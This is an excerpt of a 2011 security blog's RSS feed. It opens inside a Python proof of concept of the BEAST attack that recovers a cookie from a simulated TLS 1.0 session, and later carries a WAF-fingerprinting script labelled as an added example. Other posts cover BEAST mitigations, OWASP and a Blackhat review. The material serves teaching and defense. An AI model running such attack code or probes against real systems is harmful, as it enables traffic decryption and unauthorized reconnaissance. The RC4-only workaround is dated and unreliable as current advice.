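        # the applet streaming a record whose plaintext the attacker fully chose
        return self.session.send_record(data)


def beast_recover(victim: VictimBrowser, secret_len: int) -> bytes:
    """Blockwise chosen-boundary attack: at most 256 guesses per secret byte."""
    recovered = b""
    for n in range(secret_len):
        # pick the path length so secret[n] is the LAST byte of a block,
        # preceded by seven bytes the attacker already knows
        path = b"/" + b"A" * (BLOCK - n % BLOCK - 1)
        request_blocks = victim.request(path)   # sniffed from the wire
        last_seen = request_blocks[-1]          # becomes the next record's IV
        known_prefix = HEAD + path + TAIL + recovered
        target_pos = len(known_prefix)          # offset of secret[n]
        assert target_pos % BLOCK == BLOCK - 1
        i = target_pos // BLOCK
        c_i, c_prev = request_blocks[i], request_blocks[i - 1]
        known7 = known_prefix[target_pos - (BLOCK - 1):target_pos]
        for g in range(256):
            guess = known7 + bytes([g])
            p_j = xor(xor(last_seen, c_prev), guess)   # P_j = C_{j-1} ^ C_{i-1} ^ x
            c_j = victim.send_controlled(p_j)[0]
            last_seen = c_j
            if c_j == c_i:                             # E(C_{i-1} ^ x) == C_i
                recovered += bytes([g])
                break
        else:
            raise RuntimeError("no guess matched; alignment bug")
    return recovered


def run_demo() -> bytes:
    key = hashlib.sha256(b"constructed demo key").digest()
    session = Tls10CbcSession(key, iv=bytes(range(BLOCK)))
    return beast_recover(VictimBrowser(session, SECRET_COOKIE), len(SECRET_COOKIE))


if __name__ == "__main__":
    print(run_demo())
```

<p>Giving every record a fresh, explicit IV, as TLS 1.1 does, breaks the attack at the <code>last_seen</code> step: the attacker no longer knows the value that will be XORed with the chosen plaintext before encryption, so <em>P<sub>j</sub></em> cannot be aimed at <em>C<sub>i-1</sub></em> &#x2295; <em>x</em>.</p>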
<p><strong>Why the problem can’t be fixed quickly</strong></p>
<p>TLS 1.1, which fixes this issue, was defined in April 2006. As you may have guessed, this problem was known before April 2006. However, it was considered mostly a theoretical issue until Thai Duong and Juliano Rizzo showed how it can be used to decrypt cookies sent over HTTPS. Even though this issue has been known for a while, it is probably not going to be fixed anytime soon because most websites do not support TLS 1.1 or TLS 1.2. According to Opera, only about 0.25 percent of web servers support TLS 1.1, and <a href="http://news.cnet.com/8301-30685_3-20108633-264/researchers-to-detail-hole-in-web-encryption/">only 0.02 percent of web servers support TLS 1.2</a>. There are workarounds that some browser vendors are currently implementing and testing; however, this problem is not going to be completely fixed until most web servers start supporting TLS 1.1 or TLS 1.2.</p>
<p><strong>Risks</strong></p>
<p>Should you be worried? Probably not. This does not significantly increase the risk of connecting to untrusted networks. There are easier attacks that can be used to steal your cookies (or your username and password) for many websites, or even install arbitrary software on your computer if you connect to untrusted networks. Some examples are:</p>
<ul>
<li>Many websites do not set the ‘secure’ flag on their session cookies, which means that a tool like sslstrip can be used by an attacker on your network to get your cookie.</li>
<li>Many websites serve login forms over HTTP (even though your password may actually be submitted over HTTPS), and attackers on your network can modify the login page to capture your username and password.</li>
<li>Many users ignore certificate warnings shown by browsers, or may not even notice that a tool like sslstrip is in use and that they are not actually accessing a site over HTTPS before entering their credentials.</li>
<li>Tools such as Evilgrade can install arbitrary software on your computer by leveraging software that has insecure automatic update mechanisms.</li>
</ul>
<p><strong>Protecting yourself</strong></p>
<p>If you want to protect yourself against BEAST-like attacks, you can take several steps:</p>
<ul>
<li>Delete all your cookies before you connect to an untrusted network.</li>
<li>Limit the amount of time you spend authenticated to HTTPS sites on untrusted networks, and remember to log out as soon as you are done.</li>
<li>Until your browser vendor releases a fix, disable all cipher suites that use block ciphers in your browser (leave only cipher suites with RC4 enabled).</li>
</ul>
<p>Note that the last workaround may cause you to be unable to access many websites. Of course, when browser vendors release security updates, install them immediately.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cigital.com/justice-league-blog/2011/09/26/beast-and-ssltls/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>An OWASP Interaction Model</title>
		<link>http://www.cigital.com/justice-league-blog/2011/09/21/an-owasp-interaction-model/</link>
		<comments>http://www.cigital.com/justice-league-blog/2011/09/21/an-owasp-interaction-model/#comments</comments>
		<pubDate>Wed, 21 Sep 2011 19:05:13 +0000</pubDate>
		<dc:creator>jOHN</dc:creator>
				<category><![CDATA[Software Security]]></category>

		<guid isPermaLink="false">http://www.cigital.com/justiceleague/?p=883</guid>
		<description><![CDATA[Out at AppSecUSA, the OWASP board met and decided that it was valuable to support a partnership model with private industry. The aim: figure out a way to allow private (or federal) organizations to shape existing OWASP assets to better meet their needs. Better meeting an organization&#8217;s needs will likely involve: Integration with standard-fare open [...]]]></description>
			<content:encoded><![CDATA[<p>Out at <a href="http://www.appsecusa.org/" title="AppSecUSA">AppSecUSA</a>, the OWASP board met and decided that it was valuable to support a partnership model with private industry. The aim: figure out a way to allow private (or federal) organizations to shape existing OWASP assets to better meet their needs. Better meeting an organization&#8217;s needs will likely involve: </p>
<ol>
<li>Integration with standard-fare open source and commercial middleware commonly used to deploy organizations&#8217; web-apps (e.g. CA SiteMinder, MQ-Series, Documentum, etc.)</li>
<li>Greater predictability (and later maturity) in asset delivery road maps and schedule</li>
<li>Complete and user-centric documentation regarding adoption, implementation, and configuration</li>
<li>Progress against existing asset gaps deemed barriers to adoption by an organization</li>
</ol>
<p><a href="https://www.owasp.org/index.php/User:Jeff_Williams" title="Jeff Williams">Jeff Williams</a> and I collaborated on a <a href="https://docs.google.com/leaf?id=1ea4jWVDziLcZMTJUC5qW5psWYROpB-oPlqyl4Ei2xHA&amp;sort=name&amp;layout=list&amp;pid=0B0kzJSN-1ikNNjg5YmFjZWItZGY2NC00ZGYwLWJkYzUtMzM5NjdlOThkOWJl&amp;cindex=1" title="Straw Man Partnership Model">Straw Man Partnership Model</a> that describes ways for organizations to interact with OWASP. </p>
<p>As described above, the &#8220;buyer&#8221; (an organizational stakeholder) drives the interaction. For this, I posit a buyer-driven workflow (see figure below).</p>
<p align="center"><img src="http://www.cigital.com/justice-league-blog/files/2011/09/buyer-producer-driven-workflow.jpg" alt="" width="75%" /><br />(Buyer-driven workflow available: <a href="https://docs.google.com/viewer?a=v&amp;pid=explorer&amp;chrome=true&amp;srcid=0B0kzJSN-1ikNMDgzYmM3ZGItZDVlMi00NTA5LTk5MmUtOWU5MTcwYWQ4YzUz&amp;hl=en_US" title="buyer-driven workflow">here</a> )</p>
<p>Summarizing, the buyer coordinates with the OWASP project owner (either directly, or through a partner such as Cigital) and determines things like: level of effort (LoE), division of responsibilities, and what will ultimately be shared. The producer then works with OWASP project team resources to hit scheduling and roadmap sign-posts. </p>
<p>If you&#8217;re interested in helping your organization benefit from open source projects, perhaps I can help there. If you&#8217;re interested in helping mature the projects themselves, I can definitely help&#8211;especially with OWASP ESAPI or cheat sheets. I&#8217;m also very interested in feedback on the <a href="https://docs.google.com/leaf?id=0B0kzJSN-1ikNNjg5YmFjZWItZGY2NC00ZGYwLWJkYzUtMzM5NjdlOThkOWJl&amp;sort=name&amp;layout=list&amp;num=50" title="whole partnership model">whole partnership model</a>. Please send mail. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.cigital.com/justice-league-blog/2011/09/21/an-owasp-interaction-model/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Building Versus Breaking: A White Hat goes to Blackhat</title>
		<link>http://www.cigital.com/justice-league-blog/2011/08/09/building-versus-breaking-a-white-hat-goes-to-blackhat/</link>
		<comments>http://www.cigital.com/justice-league-blog/2011/08/09/building-versus-breaking-a-white-hat-goes-to-blackhat/#comments</comments>
		<pubDate>Tue, 09 Aug 2011 20:25:05 +0000</pubDate>
		<dc:creator>gem</dc:creator>
				<category><![CDATA[Software Security]]></category>

		<guid isPermaLink="false">http://www.cigital.com/justiceleague/?p=859</guid>
		<description><![CDATA[Is Blackhat worth attending? Kinda. My philosophy of software security and security in general has plenty of room for the art of the exploit. The icon that I have adopted to &#8220;brand&#8221; my work, the yin/yang with cowboy hats includes a black hat for a reason! Here&#8217;s what I said about the icon in the [...]]]></description>
			<content:encoded><![CDATA[<p>Is Blackhat worth attending?  Kinda.</p>
<p>My philosophy of software security and security in general has plenty of room for the art of the exploit.  The icon that I have adopted to &#8220;brand&#8221; my work, the yin/yang with cowboy hats includes a black hat for a reason!  Here&#8217;s what I said about the icon in the Preface of <a href="http://swsec.com"><em>Software Security</em></a>:</p>
<p><img src="/images/yy-hats-1.gif" width="100" height="99" style="clear: both;margin-right: 10px;margin-bottom: 10px" align="left" /> </p>
<blockquote><p>
   <em>Fundamental material is covered under this icon (which also adorns the cover of the book).    The Yin/Yang is the classic Eastern symbol describing the inextricable mixing of standard Western Polemics (black/white, good/evil, Heaven/Hell, create/destroy, et cetera).  Eastern philosophies are described as holistic because they teach that reality combines polemics in such a way that one pole cannot be sundered from the other.  In the case of software security, two distinct threads—black hat activities and white hat activities (offense/defense, construction/destruction)—intertwine to make up software security.  A holistic approach, combining yin and yang (mixing black hat and white hat approaches) is what is required.</em>
</p></blockquote>
<p>The White Hat + Black Hat approach informs three of my books and the entire <a href="http://buildingsecurityin.com"><em>Addison-Wesley Software Security Series</em></a>:</p>
<p style="margin-top: 0;clear: both"><a href="http://www.amazon.com/Building-Secure-Software-Security-paperback/dp/0321774957/ref=sr_1_1?s=books&amp;ie=UTF8&amp;qid=1312906243&amp;sr=1-1"><img src="/i/books/bss.jpg" width="62" height="80" border="0" alt="Building Secure Software" style="border: 1px solid #CCCCCC;margin-right: 10px;margin-bottom: 10px" align="left"></a><a href="http://www.amazon.com/Building-Secure-Software-Security-paperback/dp/0321774957/ref=sr_1_1?s=books&amp;ie=UTF8&amp;qid=1312906243&amp;sr=1-1"><em>Building Secure Software</em></a> (BSS), the white hat book, seems to have touched off a revolution.  Security people who once relied solely on firewalls, intrusion detection, and anti-virus mechanisms came to understand and embrace the necessity of better software.  BSS provides a coherent and sensible philosophical foundation for the blossoming field of software security.</p>
<p style="margin-top: 0;clear: both"><a href="http://exploitingsoftware.com"><img src="/i/books/expsoft_tn.jpg" width="60" height="80" border="0" alt="Exploiting Software" style="border: 1px solid #CCCCCC;margin-right: 10px;margin-bottom: 10px" align="left" /></a><a href="http://exploitingsoftware.com"><em>Exploiting Software</em></a> (ES), the black hat book, provides a much needed balance, teaching about how to break software and how malicious hackers write exploits. ES is meant as a reality check for software security, ensuring that the good guys address real attacks and invent and peddle solutions that actually work.  The two books are in some sense mirror images.</p>
<p style="margin-top: 0;clear: both"><a href="http://swsec.com"><img src="/i/books/swsec_tn.jpg" width="60" height="80" border="0" alt="Software Security" style="border: 1px solid #CCCCCC;margin-right: 10px;margin-bottom: 10px;margin-top: 0" align="left" /></a><a href="http://swsec.com"><em>Software Security</em></a> unifies the two sides of software security—attack and defense, exploiting and designing, breaking and building—into a coherent whole.  Like the yin and the yang, software security requires a careful balance.</p>
<p style="clear: both">It may come as a surprise to you that I had never attended the famed Blackhat conference until this year.  There are a couple of reasons for this, not the least of which is that my two-time co-author Greg Hoglund has &#8220;covered&#8221; Blackhat most admirably for a decade.  More generally, I guess my bias is definitely more toward building systems properly and security engineering than toward penetration testing and throwing rocks at existing systems.</p>
<p>Blackhat and its sister con Defcon have always had reputations as &#8220;hackerboy&#8221; conferences populated by l33t &#8220;researchers&#8221; bent on breaking systems in spectacular fashion.  I suppose Blackhat has over the years evolved into something more commercial, with a major shift in emphasis coming when it was purchased by <a href="http://liveevents.techweb.com/">UBM</a>.  Many of my associates in security have said that Blackhat attendance has shifted toward the corporate end of the spectrum and that it was looking more like the RSA Conference attendance-wise.  As a consultant to large corporations taking software security seriously, this perceived shift is not to be ignored.  That&#8217;s why I went to see for myself what&#8217;s up with Blackhat.</p>
<p>(I suppose I should throw in a quick aside here to point out that in my view being sentenced to spend time in Las Vegas is second only to the pain of spending time in Orlando.  Just not my bag and a definite personal bias.)</p>
<p>Bottom line?  Blackhat appears to be populated by plenty of security vendors <a href="https://www.blackhat.com/html/bh-us-11/bh-us-11-schedule.html">mostly presenting to each other</a>.  I found a handful of Cigital customers at the show, but far more security practitioners who work for vendors than any other category of attendee.  That probably makes Blackhat a reasonable show to attend if you&#8217;re interested in hiring pen testers and understanding something about the latest flavors of attacks.  There were certainly some very superb people presenting at the show (Litchfield, Laurie, and Russinovich pop immediately to mind), but Blackhat seems to be more about after hours parties than security content&#8212;especially when it comes to engineering. That leaves me feeling conflicted about its value. </p>
<p>At this point in the life of software security as a field, I think we need to spend less time thinking about breaking systems and finding vulnerabilities than about fixing systems and mitigating vulnerabilities.  (Not none, mind you, just less.)  There were a couple of presentations and panels on the agenda that touched on software security basics, but a vast majority of the content is about (gleefully) breaking things.  Incidentally, that&#8217;s why it was interesting to me that Microsoft announced its new <a href="http://searchsecurity.techtarget.com/news/2240039220/New-Microsoft-BlueHat-Prize-offers-250000-for-security-innovation">security engineering Bluehat prize at the show</a>.  Seems like they might get better traction with that at Usenix Security, ISOC NDSS, or even RSA?!</p>
<p>There is certainly networking to be done at Blackhat, but nowhere near at the same scale or caliber as the networking at RSA (the security tradeshow that absolutely everybody attends).  If you&#8217;re not up for late nights, loud dance music, bad well drinks, and club-based Vegas mayhem, Blackhat may not be your scene.  Maybe I&#8217;m just getting old.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cigital.com/justice-league-blog/2011/08/09/building-versus-breaking-a-white-hat-goes-to-blackhat/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Art of InfoJacking – What Lies Beneath</title>
		<link>http://www.cigital.com/justice-league-blog/2011/07/20/art-of-infojacking-%e2%80%93-what-lies-beneath/</link>
		<comments>http://www.cigital.com/justice-league-blog/2011/07/20/art-of-infojacking-%e2%80%93-what-lies-beneath/#comments</comments>
		<pubDate>Wed, 20 Jul 2011 19:11:36 +0000</pubDate>
		<dc:creator>justiceadmin</dc:creator>
				<category><![CDATA[Software Security]]></category>

		<guid isPermaLink="false">http://www.cigital.com/justiceleague/?p=854</guid>
		<description><![CDATA[This is a guest post by Aditya K. Sood, a Security Practitioner at Cigital. Information gathering is considered as one of the most critical step in performing aggressive penetration testing in all types of environment. With the proliferation of web vulnerabilities, the online world has introduced new protection mechanisms such as web applications firewalls. It [...]]]></description>
			<content:encoded><![CDATA[<p><em>This is a guest post by Aditya K. Sood, a Security Practitioner at Cigital.</em></p>
<p>Information gathering is considered one of the most critical steps in performing aggressive penetration testing in all types of environments. With the proliferation of web vulnerabilities, the online world has introduced new protection mechanisms such as web application firewalls. It is important to fingerprint these web application firewalls in order to conduct efficient and robust testing of websites and financial applications. A Web Application Firewall (WAF) implements server cloaking and normalization by manipulating HTTP response headers. Every WAF nevertheless exhibits unique behavior, which enables testers to fingerprint the presence of that WAF in a production environment. Signatures built from that behavior are what detect the presence of hidden devices in the network.</p>
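<p>The fingerprinting idea above, as an added example that is not part of this post or the slides it points to. It scores a captured HTTP response against a small signature table (header names, header values and cookie prefixes) and adds the behavioral check the post alludes to: compare how the target answers a benign request and one carrying an obvious attack string, since an origin server answers both alike while a WAF typically blocks the second. The signature entries are a short illustrative subset from general knowledge of those products, not from the post, and the sample responses are constructed; a real tool carries a much larger, maintained signature list.</p>

```python
import re
from typing import Dict, List, Tuple

# Illustrative signature subset (assembled for this example, not from the post).
# Header rules: (WAF name, regex on lower-cased header name, regex on value).
HEADER_SIGNATURES = [
    ("Cloudflare", r"^cf-ray$", r""),
    ("Cloudflare", r"^server$", r"^cloudflare"),
    ("Citrix NetScaler", r"^(cneonction|nncoection)$", r""),  # mangled header
    ("Citrix NetScaler", r"^via$", r"NS-CACHE"),
]
# Cookie rules: (WAF name, regex on a Set-Cookie value).
COOKIE_SIGNATURES = [
    ("Incapsula", r"^(incap_ses_|visid_incap_)"),
    ("Citrix NetScaler", r"^(ns_af|citrix_ns_id)="),
]


def parse_response(raw: str) -> Tuple[int, List[Tuple[str, str]]]:
    """Split a raw HTTP/1.x response into (status code, [(name, value), ...]).
    Names are lower-cased; repeated names such as Set-Cookie are all kept."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = re.split(r"\r?\n", head)
    status = int(lines[0].split()[1])
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return status, headers


def fingerprint(raw: str) -> List[str]:
    """Passive check: which WAF products leave recognisable marks in the response."""
    _, headers = parse_response(raw)
    hits = set()
    for name, value in headers:
        for waf, name_re, value_re in HEADER_SIGNATURES:
            if re.match(name_re, name) and re.search(value_re, value, re.I):
                hits.add(waf)
        if name == "set-cookie":
            for waf, cookie_re in COOKIE_SIGNATURES:
                if re.search(cookie_re, value, re.I):
                    hits.add(waf)
    return sorted(hits)


def behaves_like_waf(benign_raw: str, probe_raw: str) -> bool:
    """Active check: the benign request succeeded but the same URL with an
    attack-looking parameter was answered differently (403, 406, 503, ...)."""
    benign_status, _ = parse_response(benign_raw)
    probe_status, _ = parse_response(probe_raw)
    return benign_status // 100 == 2 and probe_status != benign_status


def assess(benign_raw: str, probe_raw: str) -> Dict[str, object]:
    """Combine both checks into one verdict for a target."""
    names = sorted(set(fingerprint(benign_raw)) | set(fingerprint(probe_raw)))
    return {"products": names, "blocks_probe": behaves_like_waf(benign_raw, probe_raw)}


# Constructed sample responses (not captured from any real site).
SAMPLE_BENIGN = (
    "HTTP/1.1 200 OK\r\nServer: cloudflare\r\nCF-RAY: 6d1f0a-IAD\r\n"
    "Set-Cookie: __cfduid=abc; Path=/\r\nContent-Type: text/html\r\n\r\n"
)
SAMPLE_PROBE = (  # same target, request carried a '<script>' probe parameter
    "HTTP/1.1 403 Forbidden\r\nServer: cloudflare\r\nCF-RAY: 6d1f0b-IAD\r\n"
    "Content-Type: text/html\r\n\r\nblocked"
)
SAMPLE_NETSCALER = (
    "HTTP/1.1 200 OK\r\nCneonction: close\r\nSet-Cookie: ns_af=XYZ; Path=/\r\n"
    "Content-Type: text/html\r\n\r\n"
)
SAMPLE_PLAIN = "HTTP/1.1 200 OK\r\nServer: Apache\r\nContent-Type: text/html\r\n\r\n"

if __name__ == "__main__":
    print(assess(SAMPLE_BENIGN, SAMPLE_PROBE))
    print(assess(SAMPLE_NETSCALER, SAMPLE_NETSCALER))
    print(assess(SAMPLE_PLAIN, SAMPLE_PLAIN))
```

<p>Keep the passive and active checks separate in a real engagement: the passive match is silent and safe to run first, while the probe request is itself a logged attack attempt and should only go out once the rules of engagement allow it.</p>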
<p>Proxy servers also play an important role in maintaining anonymity in networks. Proxy servers are configured in a myriad of ways, including static and dynamic configuration. Testing has shown that dynamic proxy configuration using WPAD indirectly relies on the collective power of DHCP and DNS, since the location of the configuration file (conventionally <em>wpad.dat</em>) is discovered through those protocols. In addition, the client browser uses Proxy Auto Configuration (PAC) files, whose <em>FindProxyForURL</em> function returns the connection string for the proxy server. Insecure access to these proxy configuration files can hand an attacker a view of, or a path into, the entire internal network. Fingerprinting proxy configuration files is therefore a valuable addition to a penetration test.</p>
<p>Anonymous access to web services and protocols is a dangerous deal and has been a major driver of attacks on anonymous services. How far it can be exploited, however, depends on the service. For example, anonymous FTP access can be used to enumerate users and directories and to initiate FTP bounce scans. These configuration flaws can be used in conjunction with web vulnerabilities to design a new attack vector, for example Cross Interface Attacks (CIA), in which the FTP console is tested against its input checks and then exploited to inject XSS/CSRF payloads that lead to remote command execution. Design flaws in network devices can also be leveraged to extract a plethora of information that is useful in refining the modus operandi of a penetration test.</p>
<p>All these issues have been discussed in detail at the Source Conference. Please refer to the slides at: <a href="http://www.cigital.com/presentations/sourceseattle2011cigital_adityaks.pdf">http://www.cigital.com/presentations/sourceseattle2011cigital_adityaks.pdf</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cigital.com/justice-league-blog/2011/07/20/art-of-infojacking-%e2%80%93-what-lies-beneath/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

